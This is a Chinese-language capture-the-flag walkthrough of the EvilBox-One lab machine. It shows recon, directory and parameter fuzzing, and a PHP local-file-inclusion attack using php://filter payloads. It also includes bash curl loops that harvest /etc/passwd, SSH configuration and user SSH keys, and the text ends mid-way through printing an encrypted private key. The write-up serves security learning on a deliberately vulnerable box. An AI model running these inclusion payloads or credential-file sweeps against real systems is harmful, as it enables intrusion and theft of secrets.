靶机: EvilBox---One

靶机: EvilBox---One

准备工作

靶机攻略

发现目标

使用常规工具:

  • arp-scan
  • nmap
  • netdiscover
  • fping

一个初步发现,使用 sudo arp-scan -l -I eth1 比较其他扫描多多少少有一定限制,nmap 适合锁定目标后进一步扫描

Interface: eth1, type: EN10MB, MAC: 08:00:27:5f:50:d7, IPv4: 192.168.56.116
Starting arp-scan 1.9.8 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.56.1    0a:00:27:00:00:0d       (Unknown: locally administered)
192.168.56.100  08:00:27:15:0f:e5       PCS Systemtechnik GmbH
192.168.56.117  08:00:27:4d:bc:dd       PCS Systemtechnik GmbH
 
3 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.9.8: 256 hosts scanned in 2.140 seconds (119.63 hosts/sec). 3 responded
  • 192.168.56.1192.168.56.100 分别是网关和 DHCP 服务器地址
  • 目标就是 192.168.56.117

使用一个 nmap 的常规扫描 nmap -A -T4 192.168.56.117

Starting Nmap 7.93 ( https://nmap.org ) at 2022-11-09 09:41 CST
Nmap scan report for 192.168.56.117
Host is up (0.0012s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 4495500be473a18511ca10ec1ccbd426 (RSA)
|   256 27db6ac73a9c5a0e47ba8d81ebd6d63c (ECDSA)
|_  256 e30756a92563d4ce3901c19ad9fede64 (ED25519)
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Apache2 Debian Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
 
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.77 seconds

  • 确认 22 端口开放服务 OpenSSH/7.9b1

  • 确认 80 端口开放服务 Apache/2.4.38

  • 系统类型是 Linux: Debian

  • SSH 暂且不考虑

    • 没有密码和密钥
    • 信息情报全无

  • 决定从 80 的 http 下手,即便不能攻破,也能收集部分信息用于 SSH 爆破

Web 攻击

先使用 firefox 访问 http://192.168.56.117:80/ 进行初步刺探

  • 发现只是一个 Apache2 Debian 的初始页面,基本没有可用信息

使用 Web 嗅探工具爬取此 Web 站点的隐藏页面,推荐以下工具

  • dirsearch
  • dirb
  • dirbuster
  • gobuster
  • feroxbuster
  • ffuf
  • wfuzz

我们使用 dirsearch --url='192.168.56.117:80/'

┌──(kali㉿kali)-[~]
└─$ dirsearch --url='192.168.56.117:80/'
 
  _|. _ _  _  _  _ _|_    v0.4.2
 (_||| _) (/_(_|| (_| )
 
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927
 
Output File: /home/kali/.dirsearch/reports/80-_22-11-09_09-52-49.txt
 
Error Log: /home/kali/.dirsearch/logs/errors-22-11-09_09-52-49.log
 
Target: http://192.168.56.117:80/
 
[09:52:49] Starting: 
[09:52:52] 403 -  279B  - /.ht_wsr.txt                                     
[09:52:52] 403 -  279B  - /.htaccess.bak1                                  
[09:52:52] 403 -  279B  - /.htaccess.sample
[09:52:52] 403 -  279B  - /.htaccess.save
[09:52:52] 403 -  279B  - /.htaccess_extra
[09:52:52] 403 -  279B  - /.htaccess_orig
[09:52:52] 403 -  279B  - /.htaccess_sc
[09:52:52] 403 -  279B  - /.htaccess.orig                                  
[09:52:52] 403 -  279B  - /.htaccessOLD
[09:52:52] 403 -  279B  - /.htaccessOLD2
[09:52:52] 403 -  279B  - /.htpasswds
[09:52:52] 403 -  279B  - /.html
[09:52:52] 403 -  279B  - /.htm                                            
[09:52:52] 403 -  279B  - /.htpasswd_test                                  
[09:52:52] 403 -  279B  - /.httr-oauth
[09:52:52] 403 -  279B  - /.htaccessBAK
[09:52:54] 403 -  279B  - /.php                                            
[09:53:51] 200 -   10KB - /index.html                                       
[09:54:23] 200 -   12B  - /robots.txt                                       
[09:54:25] 200 -    4B  - /secret/                                          
[09:54:25] 301 -  317B  - /secret  ->  http://192.168.56.117/secret/        
[09:54:25] 403 -  279B  - /server-status                                    
[09:54:25] 403 -  279B  - /server-status/

  • /index.html 明显是前面 Apache2 Debian 的初始页面,没有价值

  • /robots.txt 一般指robots协议,存在些许价值

    • robots 协议也称爬虫协议、爬虫规则等,是指网站可建立一个 robots.txt 文件来告诉搜索引擎哪些页面可以抓取,哪些页面不能抓取,而搜索引擎则通过读取 robots.txt 文件来识别这个页面是否允许被抓取
    • 但是这个 robots 协议不是防火墙,也没有强制执行力,搜索引擎完全可以忽视 robots.txt 文件去抓取网页的快照

  • /secret 一个目录,可能需要进一步探索

我们先查看一下 http://192.168.56.117:80/robots.txt 看看有什么

  • 发现一句话:Hello H4x0r

    • 科普 H4x0r 是代指 Hacker 表示黑客,是 l33t speak 的一种暗语或黑话,其中 H4x0r 便是 Hacker 的意思
    • 这个应该是对入侵者的嘲讽,没有多少价值,也可能密码或账号会与 H4x0r 有关,我们暂且收录

  • robots.txt 如果是这种近乎空的内容是起到反爬虫的作用

目前还有价值的是 /secret 目录,让我们进行二次 Web 页面探取,使用 dirsearch --url='192.168.56.117:80/secret'

  • 使用 dirsearch 并没有结果,我们可以尝试换一个字典,使用命令 dirsearch --url='192.168.56.117:80/secret' --wordlists=/usr/share/seclists/Discovery/Web-Content/directory-list-1.0.txt -e txt,php,html,jsp

    • --wordlists= 是指定字典
    • seclists 是 kali 的一个字典集,如果没有可以直接在 kali 安装
    • -e 是指定搜索范围的文件拓展名
    • 爆破速度可能会很慢,如果 kali 分配的内核和内存足够可以不必顾虑,如果 kali 配置性能查可以使用 gobuster 命令 gobuster dir --url='192.168.56.117:80/secret' --wordlists=/usr/share/seclists/Discovery/Web-Content/directory-list-1.0.txt -x txt,php,html,jsp 毕竟 dirsearch 使用 python 速度都知道,而 gobuster 是 go 编写接近于 C 的速度
┌──(kali㉿kali)-[~]
└─$ gobuster dir --url='192.168.56.117:80/secret' -w /usr/share/seclists/Discovery/Web-Content/directory-list-1.0.txt -x txt,php,html,jsp 
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.117:80/secret
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/directory-list-1.0.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.3
[+] Extensions:              txt,php,html,jsp
[+] Timeout:                 10s
===============================================================
2022/11/09 19:35:29 Starting gobuster in directory enumeration mode
===============================================================
/.php                 (Status: 403) [Size: 279]
/.html                (Status: 403) [Size: 279]
/index.html           (Status: 200) [Size: 4]
/evil.php             (Status: 200) [Size: 0]ec
Progress: 708415 / 708545 (99.98%)===============================================================
2022/11/09 19:42:23 Finished
===============================================================
  • 对于 Web 目录爆破使用工具不是重点,重点是 字典 选取
  • 结果是 /evil.php 我们的新线索

我们尝试访问 /evil.php 发现什么也没有,即使是查看 Web 源码也没有什么,那么我们可以猜测这个页面属于脚本可能是用于处理数据的,如果是这样那一定存在请求参数这样才有数据交互,我们下一步:便是进行参数爆破

此处我们使用 ffuf 进行

  • 参数字典我们使用 kali 经典的 seclists

  • 我们构建的值字典:var.txt

    		0
    		1
    		a
    		'
    		"
    		(
    		[
    		{
    		<
    		,
    		;
    		?
    		`
    		/
    		\
    		%
    		ture
    		false
    		../robots.txt
    		H4x0r

    构建思路,可能性的猜测【触发漏洞的值,具有普遍性的内容,确定的文件,收集信息】

    • 数字类型:0, 1 表示数值或布尔值,经典试探
    • 字母:a 表示一个单字母或字符串或词
    • 括号闭合错误:', ", (, [, {, <
    • 特殊字符:, ; ? ` / \ %
    • 布尔表示:ture, false
    • 文件包含类类型:../robots.txt 这是一个我们 已知存在内容不复杂易反馈 的内部文件
    • 收集信息:H4x0r

  • 构建 ffuf 的命令 ffuf -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt:params -w ./var.txt:var -u http://192.168.56.117/secret/evil.php?params=var -fs 0

    • -w 是知道字典,在字典组合格式是 字典路径:字典代称
    • -u 是指定爆破请求 Web 路径
    • -fs 是过滤 HTTP 响应体大小,意思是返回大小为 0 直接筛掉
┌──(kali㉿kali)-[~/workspace]
└─$ ffuf -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt:params -w ./var.txt:var -u http://192.168.56.117/secret/evil.php?params=var -fs 0
 
        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       
 
       v1.5.0 Kali Exclusive <3
________________________________________________
 
 :: Method           : GET
 :: URL              : http://192.168.56.117/secret/evil.php?params=var
 :: Wordlist         : params: /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt
 :: Wordlist         : var: ./var.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405,500
 :: Filter           : Response size: 0
________________________________________________
 
[Status: 200, Size: 12, Words: 2, Lines: 2, Duration: 50ms]
    * params: command
    * var: ../robots.txt
 
:: Progress: [109701/109701] :: Job [1/1] :: 1599 req/sec :: Duration: [0:02:00] :: Errors: 0 ::
  • 结果表明参数是 command
  • 数值是 ../robots.txt 表明 /evil.php 是文件包含作用

我们构建一个请求,对 /evil.php 功能进行进一步测试,构建 http://192.168.56.117/secret/evil.php?command=../robots.txt 用 firefox 访问并查看源码发现返回内容很 纯粹 ,与 /robots.txt 并无区别,大致可以判断其文件包含会直接返回,学习过 PHP 应该知道 PHP 文件包含漏洞,我们可以从这个方面入手

  • 检查包含是否支持远程,如果能直接木马登录

    		┌──(kali㉿kali)-[~/workspace]
    		└─$ ls                                                              
    		var.txt
    		                                                                    
    		┌──(kali㉿kali)-[~/workspace]
    		└─$ python3 -m http.server 80
    		Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
    		 
    		-- 水平分割 --
    		┌──(kali㉿kali)-[~]
    		└─$ curl "http://192.168.56.117/secret/evil.php?command=http://192.168.56.116:80/var.txt"
    • 不支持远程

  • 是否能动用 PHP 内置 URL 风格的 封装协议,如果能直接写入木马登录

    		┌──(kali㉿kali)-[~/workspace]
    		└─$ curl "http://192.168.56.117/secret/evil.php?command=php://filter/read=convert.base64-encode/resource=../robots.txt"                   3 ⨯
    		SGVsbG8gSDR4MHIK
    		 
    		┌──(kali㉿kali)-[~]
    		└─$ curl "http://192.168.56.117/secret/evil.php?command=php://filter/write/resource=../robots.txt&txt=1"
    		Hello H4x0r
    		 
    		┌──(kali㉿kali)-[~]
    		└─$ curl "http://192.168.56.117/secret/evil.php?command=php://filter/read=convert.base64-encode/resource=./evil.php" | base64 --decode   1 ⨯
    		% Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
    		                                Dload  Upload   Total   Spent    Left  Speed
    		100    92  100    92    0     0   8532      0 --:--:-- --:--:-- --:--:--  9200
    		<?php
    		    $filename = $_GET['command'];
    		    include($filename);
    		?>
    • 可以使用 php:// 访问各个 IO 流进行读取
    • 但无法写入数据
    • 通过加密读取,我们可以窥探 evil.php 内容,发现只是一个简单的文件上传
    		<?php
    		    $filename = $_GET['command'];
    		    include($filename);
    		?>

  • 检查包含能否对系统敏感文件直接窥探,继续收集信息寻求突破

    • 一般查看 /etc/passwd/etc/shadow/etc/sudoers*/.ssh/authorized_keys ...

    构建字典 file.txt

    		/apache/apache/conf/httpd.conf
    		/apache/apache2/conf/httpd.conf
    		/apache/php/php.ini
    		/bin/php.ini
    		/etc/anacrontab
    		/etc/apache/apache.conf
    		/etc/apache/httpd.conf
    		/etc/apache2/apache.conf
    		/etc/apache2/httpd.conf
    		/etc/apache2/sites-available/default
    		/etc/apache2/vhosts.d/00_default_vhost.conf
    		/etc/at.allow
    		/etc/at.deny
    		/etc/cron.allow
    		/etc/cron.deny
    		/etc/crontab
    		/etc/fstab
    		/etc/host.conf
    		/etc/httpd/conf.d/httpd.conf
    		/etc/httpd/conf.d/php.conf
    		/etc/httpd/conf/httpd.conf
    		/etc/httpd/htdocs/index.html
    		/etc/httpd/htdocs/index.php
    		/etc/httpd/logs/access.log
    		/etc/httpd/logs/access_log
    		/etc/httpd/logs/error.log
    		/etc/httpd/logs/error_log
    		/etc/httpd/php.ini
    		/etc/init.d/httpd
    		/etc/init.d/mysql
    		/etc/ld.so.conf
    		/etc/motd
    		/etc/my.cnf
    		/etc/mysql/my.cnf
    		/etc/mysql/my.cnf
    		/etc/network/interfaces
    		/etc/networks
    		/etc/passwd
    		/etc/php.ini
    		/etc/php/apache/php.ini
    		/etc/php/apache2/php.ini
    		/etc/php/cgi/php.ini
    		/etc/php/php.ini
    		/etc/php/php4/php.ini
    		/etc/php4.4/fcgi/php.ini
    		/etc/php4/apache/php.ini
    		/etc/php4/apache2/php.ini
    		/etc/php4/cgi/php.ini
    		/etc/php5/apache/php.ini
    		/etc/php5/apache2/php.ini
    		/etc/php5/cgi/php.ini
    		/etc/phpmyadmin/config.inc.php
    		/etc/resolv.conf
    		/etc/shadow
    		/etc/ssh/sshd_config
    		/etc/ssh/ssh_config
    		/etc/ssh/ssh_host_dsa_key
    		/etc/ssh/ssh_host_dsa_key
    		/etc/ssh/ssh_host_dsa_key.pub
    		/etc/ssh/ssh_host_dsa_key.pub
    		/etc/ssh/ssh_host_key
    		/etc/ssh/ssh_host_key
    		/etc/ssh/ssh_host_key.pub
    		/etc/ssh/ssh_host_key.pub
    		/etc/ssh/ssh_host_rsa_key
    		/etc/ssh/ssh_host_rsa_key
    		/etc/ssh/ssh_host_rsa_key.pub
    		/etc/ssh/ssh_host_rsa_key.pub
    		/etc/sysconfig/network
    		/etc/sysconfig/network
    		/home/apache/conf/httpd.conf
    		/home/apache2/conf/httpd.conf
    		/home/bin/stable/apache/php.ini
    		/home2/bin/stable/apache/php.ini
    		/NetServer/bin/stable/apache/php.ini
    		/opt/www/conf/httpd.conf
    		/opt/www/htdocs/index.html
    		/opt/www/htdocs/index.php
    		/opt/xampp/etc/php.ini
    		/PHP/php.ini
    		/php/php.ini
    		/php4/php.ini
    		/php5/php.ini
    		/root/.atftp_history
    		/root/.bashrc
    		/root/.bash_history
    		/root/.mysql_history
    		/root/.nano_history
    		/root/.php_history
    		/root/.profile
    		/root/.ssh/authorized_keys
    		/root/.ssh/identity
    		/root/.ssh/identity.pub
    		/root/.ssh/id_dsa
    		/root/.ssh/id_dsa.pub
    		/root/.ssh/id_rsa
    		/root/.ssh/id_rsa.pub
    		/root/anaconda-ks.cfg
    		/tmp/apache/htdocs/index.html
    		/tmp/apache/htdocs/index.php
    		/usr/lib/php.ini
    		/usr/lib/php/php.ini
    		/usr/local/apache/conf/httpd.conf
    		/usr/local/apache/conf/php.ini
    		/usr/local/apache/htdocs/index.html
    		/usr/local/apache/htdocs/index.php
    		/usr/local/apache/logs/access.log
    		/usr/local/apache/logs/access_log
    		/usr/local/apache/logs/access_logaccess_log.old
    		/usr/local/apache/logs/error.log
    		/usr/local/apache/logs/error_log
    		/usr/local/apache/logs/error_logerror_log.old
    		/usr/local/apache2/conf/httpd.conf
    		/usr/local/apache2/conf/php.ini
    		/usr/local/apache2/htdocs/index.html
    		/usr/local/apache2/htdocs/index.php
    		/usr/local/cpanel/logs
    		/usr/local/cpanel/logs/access_log
    		/usr/local/cpanel/logs/error_log
    		/usr/local/cpanel/logs/license_log
    		/usr/local/cpanel/logs/login_log
    		/usr/local/cpanel/logs/stats_log
    		/usr/local/cpanel/logs/stats_log
    		/usr/local/etc/php.ini
    		/usr/local/httpd/conf/httpd.conf
    		/usr/local/httpd2.2/htdocs/index.html
    		/usr/local/httpd2.2/htdocs/index.php
    		/usr/local/lib/php.ini
    		/usr/local/mysql/bin/mysql
    		/usr/local/mysql/my.cnf
    		/usr/local/php/lib/php.ini
    		/usr/local/php4/lib/php.ini
    		/usr/local/php4/lib/php.ini
    		/usr/local/php4/php.ini
    		/usr/local/php5/etc/php.ini
    		/usr/local/php5/lib/php.ini
    		/usr/local/php5/php5.ini
    		/usr/local/share/examples/php/php.ini
    		/usr/local/share/examples/php4/php.ini
    		/usr/local/tomcat5527/bin/version.sh
    		/usr/local/Zend/etc/php.ini
    		/usr/share/tomcat6/bin/startup.sh
    		/usr/tomcat6/bin/startup.sh
    		/var/apache2/config.inc
    		/var/httpd/conf/httpd.conf
    		/var/httpd/conf/php.ini
    		/var/httpd/conf/php.ini
    		/var/httpd/htdocs/index.html
    		/var/httpd/htdocs/index.php
    		/var/lib/mysql/my.cnf
    		/var/lib/mysql/mysql/user.MYD
    		/var/local/www/conf/httpd.conf
    		/var/local/www/conf/php.ini
    		/var/log/access.log
    		/var/log/access_log
    		/var/log/apache/access.log
    		/var/log/apache/access_log
    		/var/log/apache/error.log
    		/var/log/apache/error_log
    		/var/log/apache2/access.log
    		/var/log/apache2/access_log
    		/var/log/apache2/error.log
    		/var/log/apache2/error_log
    		/var/log/error.log
    		/var/log/error_log
    		/var/log/mysql.log
    		/var/log/mysql/mysql-bin.log
    		/var/log/mysql/mysql-slow.log
    		/var/log/mysql/mysql.log
    		/var/log/mysqlderror.log
    		/var/mail/root
    		/var/mysql.log
    		/var/spool/cron/crontabs/root
    		/var/spool/mail/root
    		/var/www/conf/httpd.conf
    		/var/www/htdocs/index.html
    		/var/www/htdocs/index.php
    		/var/www/index.html
    		/var/www/index.php
    		/var/www/logs/access.log
    		/var/www/logs/access_log
    		/var/www/logs/error.log
    		/var/www/logs/error_log
    		/web/conf/php.ini
    		/www/conf/httpd.conf
    		/www/htdocs/index.html
    		/www/htdocs/index.php
    		/www/php/php.ini
    		/www/php4/php.ini
    		/www/php5/php.ini
    		/xampp/apache/bin/php.ini
    		/xampp/apache/conf/httpd.conf
    		root/.ssh/authorized_keys
    		root/.ssh/identity
    		root/.ssh/identity.pub
    		root/.ssh/id_dsa
    		root/.ssh/id_dsa.pub
    		root/.ssh/id_rsa
    		root/.ssh/id_rsa.pub

    构建的爆破语句 bash 脚本

    		for i in $(cat ./file.txt)
    		do
    		    echo ">>>$i:"
    		    curl "http://192.168.56.117/secret/evil.php?command=$i"
    		done

下面结果经过处理,重复或无结果或结果为默认内容是被去除了的

┌──(kali㉿kali)-[~/workspace]
└─$ for i in $(cat ./file.txt)
for> do
for> echo ">>>$i:"
for> curl "http://192.168.56.117/secret/evil.php?command=$i"
for> done
 
>>>/etc/passwd:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
mowree:x:1000:1000:mowree,,,:/home/mowree:/bin/bash
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
 
>>>/etc/resolv.conf:
domain home
search home
nameserver 192.168.1.1
 
>>>/etc/ssh/sshd_config:
#       $OpenBSD: sshd_config,v 1.103 2018/04/09 20:41:22 tj Exp $
 
# This is the sshd server system-wide configuration file.  See
# sshd_config(5) for more information.
 
# This sshd was compiled with PATH=/usr/bin:/bin:/usr/sbin:/sbin
 
# The strategy used for options in the default sshd_config shipped with
# OpenSSH is to specify options with their default value where
# possible, but leave them commented.  Uncommented options override the
# default value.
 
#Port 22
#AddressFamily any
#ListenAddress 0.0.0.0
#ListenAddress ::
 
#HostKey /etc/ssh/ssh_host_rsa_key
#HostKey /etc/ssh/ssh_host_ecdsa_key
#HostKey /etc/ssh/ssh_host_ed25519_key
 
# Ciphers and keying
#RekeyLimit default none
 
# Logging
#SyslogFacility AUTH
#LogLevel INFO
 
# Authentication:
 
#LoginGraceTime 2m
#PermitRootLogin prohibit-password
#StrictModes yes
#MaxAuthTries 6
#MaxSessions 10
 
#PubkeyAuthentication yes
 
# Expect .ssh/authorized_keys2 to be disregarded by default in future.
#AuthorizedKeysFile     .ssh/authorized_keys .ssh/authorized_keys2
 
#AuthorizedPrincipalsFile none
 
#AuthorizedKeysCommand none
#AuthorizedKeysCommandUser nobody
 
# For this to work you will also need host keys in /etc/ssh/ssh_known_hosts
#HostbasedAuthentication no
# Change to yes if you don't trust ~/.ssh/known_hosts for
# HostbasedAuthentication
#IgnoreUserKnownHosts no
# Don't read the user's ~/.rhosts and ~/.shosts files
#IgnoreRhosts yes
 
# To disable tunneled clear text passwords, change to no here!
#PasswordAuthentication yes
#PermitEmptyPasswords no
 
# Change to yes to enable challenge-response passwords (beware issues with
# some PAM modules and threads)
ChallengeResponseAuthentication no
 
# Kerberos options
#KerberosAuthentication no
#KerberosOrLocalPasswd yes
#KerberosTicketCleanup yes
#KerberosGetAFSToken no
 
# GSSAPI options
#GSSAPIAuthentication no
#GSSAPICleanupCredentials yes
#GSSAPIStrictAcceptorCheck yes
#GSSAPIKeyExchange no
 
# Set this to 'yes' to enable PAM authentication, account processing,
# and session processing. If this is enabled, PAM authentication will
# be allowed through the ChallengeResponseAuthentication and
# PasswordAuthentication.  Depending on your PAM configuration,
# PAM authentication via ChallengeResponseAuthentication may bypass
# the setting of "PermitRootLogin without-password".
# If you just want the PAM account and session checks to run without
# PAM authentication, then enable this but set PasswordAuthentication
# and ChallengeResponseAuthentication to 'no'.
UsePAM yes
 
#AllowAgentForwarding yes
#AllowTcpForwarding yes
#GatewayPorts no
X11Forwarding yes
#X11DisplayOffset 10
#X11UseLocalhost yes
#PermitTTY yes
PrintMotd no
PrintLastLog no
#TCPKeepAlive yes
#PermitUserEnvironment no
#Compression delayed
#ClientAliveInterval 0
#ClientAliveCountMax 3
#UseDNS no
#PidFile /var/run/sshd.pid
#MaxStartups 10:30:100
#PermitTunnel no
#ChrootDirectory none
#VersionAddendum none
 
# no default banner path
#Banner none
 
# Allow client to pass locale environment variables
AcceptEnv LANG LC_*
 
# override default of no subsystems
Subsystem       sftp    /usr/lib/openssh/sftp-server
 
# Example of overriding settings on a per-user basis
#Match User anoncvs
#       X11Forwarding no
#       AllowTcpForwarding no
#       PermitTTY no
#       ForceCommand cvs server
 
>>>/etc/ssh/ssh_config:
 
# This is the ssh client system-wide configuration file.  See
# ssh_config(5) for more information.  This file provides defaults for
# users, and the values can be changed in per-user configuration files
# or on the command line.
 
# Configuration data is parsed as follows:
#  1. command line options
#  2. user-specific file
#  3. system-wide file
# Any configuration value is only changed the first time it is set.
# Thus, host-specific definitions should be at the beginning of the
# configuration file, and defaults at the end.
 
# Site-wide defaults for some commonly used options.  For a comprehensive
# list of available options, their meanings and defaults, please see the
# ssh_config(5) man page.
 
Host *
#   ForwardAgent no
#   ForwardX11 no
#   ForwardX11Trusted yes
#   PasswordAuthentication yes
#   HostbasedAuthentication no
#   GSSAPIAuthentication no
#   GSSAPIDelegateCredentials no
#   GSSAPIKeyExchange no
#   GSSAPITrustDNS no
#   BatchMode no
#   CheckHostIP yes
#   AddressFamily any
#   ConnectTimeout 0
#   StrictHostKeyChecking ask
#   IdentityFile ~/.ssh/id_rsa
#   IdentityFile ~/.ssh/id_dsa
#   IdentityFile ~/.ssh/id_ecdsa
#   IdentityFile ~/.ssh/id_ed25519
#   Port 22
#   Protocol 2
#   Ciphers aes128-ctr,aes192-ctr,aes256-ctr,aes128-cbc,3des-cbc
#   MACs hmac-md5,hmac-sha1,umac-64@openssh.com
#   EscapeChar ~
#   Tunnel no
#   TunnelDevice any:any
#   PermitLocalCommand no
#   VisualHostKey no
#   ProxyCommand ssh -q -W %h:%p gateway.example.com
#   RekeyLimit 1G 1h
    SendEnv LANG LC_*
    HashKnownHosts yes
    GSSAPIAuthentication yes
 
>>>/etc/ssh/ssh_host_rsa_key.pub:
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDsg5B3Ae75r4szTNFqG247Ea8vKjxulITlFGE9YEK4KLJA86TskXQn9E24yX4cYMoF0WDn7JD782HfHCrV74r8nU2kVTw5Y8ZRyBEqDwk6vmOzMvq1Kzrcj+i4f17saErC9YVgx5/33e7UkLXt3MYVjVPIekf/sxWxS4b6N0+J1xiISNcoL/kmG3L7McJzX6Qx6cWtauJf3HOxNtZJ94WetHArSpUyIsn83P+Quxa/uaUgGPx4EkHL7Qx3AVIBbKA7uDet/pZUchcPq/4gv25DKJH4XIty+5/yNQo1EMd6Ra5A9SmnhWjSxdFqTGHpdKnyYHr4VeZ7cpvpQnoiV4y9 root@EvilBoxOne

下面是中奖内容:

  • /etc/crontab 内容是默认
  • /etc/fstab 内容是默认
  • /etc/host.conf 内容是默认
  • /etc/ld.so.conf 内容是默认
  • /etc/network/interfaces 内容是默认
  • /etc/networks 无用
  • /etc/passwd
  • /etc/resolv.conf 无用
  • /etc/ssh/sshd_config 内容是默认
  • /etc/ssh/ssh_config 内容是默认
  • /etc/ssh/ssh_host_rsa_key.pub

新的细节发现

  • /etc/passwd

    • 我们知道还存在一个名为 mowree 的用户

  • /etc/ssh/ssh_host_rsa_key.pub

    • ssh 登录线索,并且登录指向 root@EvilBoxOne

信息不足,但我们有新的线索是 mowree 看看它是否存在 .ssh 的登录内容,构建一个简单的 ssh 猜测字典 ssh_dict.txt 比较我们发现 /etc/ssh/ssh_host_rsa_key.pub 的存在

/root/.ssh/authorized_keys
/root/.ssh/identity
/root/.ssh/identity.pub
/root/.ssh/id_dsa
/root/.ssh/id_dsa.pub
/root/.ssh/id_rsa
/root/.ssh/id_rsa.pub
/root/.ssh/ssh_host_dsa_key
/root/.ssh/ssh_host_dsa_key.pub
/root/.ssh/ssh_host_key
/root/.ssh/ssh_host_key.pub
/root/.ssh/ssh_host_rsa_key
/root/.ssh/ssh_host_rsa_key.pub
/home/mowree/.ssh/authorized_keys
/home/mowree/.ssh/identity
/home/mowree/.ssh/identity.pub
/home/mowree/.ssh/id_dsa
/home/mowree/.ssh/id_dsa.pub
/home/mowree/.ssh/id_rsa
/home/mowree/.ssh/id_rsa.pub
/home/mowree/.ssh/ssh_host_dsa_key
/home/mowree/.ssh/ssh_host_dsa_key.pub
/home/mowree/.ssh/ssh_host_key
/home/mowree/.ssh/ssh_host_key.pub
/home/mowree/.ssh/ssh_host_rsa_key
/home/mowree/.ssh/ssh_host_rsa_key.pub

  • 攻击脚本

    		for i in $(cat ./ssh_dict.txt);
    		do
    		echo "输出 >>>$i:";
    		curl "http://192.168.56.117/secret/evil.php?command=$i";
    		done

  • 结果

    		输出 >>>/root/.ssh/authorized_keys:
    		输出 >>>/root/.ssh/identity:
    		输出 >>>/root/.ssh/identity.pub:
    		输出 >>>/root/.ssh/id_dsa:
    		输出 >>>/root/.ssh/id_dsa.pub:
    		输出 >>>/root/.ssh/id_rsa:
    		输出 >>>/root/.ssh/id_rsa.pub:
    		输出 >>>/root/.ssh/ssh_host_dsa_key:
    		输出 >>>/root/.ssh/ssh_host_dsa_key.pub:
    		输出 >>>/root/.ssh/ssh_host_key:
    		输出 >>>/root/.ssh/ssh_host_key.pub:
    		输出 >>>/root/.ssh/ssh_host_rsa_key:
    		输出 >>>/root/.ssh/ssh_host_rsa_key.pub:
    		输出 >>>/home/mowree/.ssh/authorized_keys:
    		ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDAXfEfC22Bpq40UDZ8QXeuQa6EVJPmW6BjB4Ud/knShqQ86qCUatKaNlMfdpzKaagEBtlVUYwit68VH5xHV/QIcAzWi+FNw0SB2KTYvS514pkYj2mqrONdu1LQLvgXIqbmV7MPyE2AsGoQrOftpLKLJ8JToaIUCgYsVPHvs9Jy3fka+qLRHb0HjekPOuMiq19OeBeuGViaqILY+w9h19ebZelN8fJKW3mX4mkpM7eH4C46J0cmbK3ztkZuQ9e8Z14yAhcehde+sEHFKVcPS0WkHl61aTQoH/XTky8dHatCUucUATnwjDvUMgrVZ5cTjr4Q4YSvSRSIgpDP2lNNs1B7 mowree@EvilBoxOne
    		输出 >>>/home/mowree/.ssh/identity:
    		输出 >>>/home/mowree/.ssh/identity.pub:
    		输出 >>>/home/mowree/.ssh/id_dsa:
    		输出 >>>/home/mowree/.ssh/id_dsa.pub:
    		输出 >>>/home/mowree/.ssh/id_rsa:
    		-----BEGIN RSA PRIVATE KEY-----
    		Proc-Type: 4,ENCRYPTED
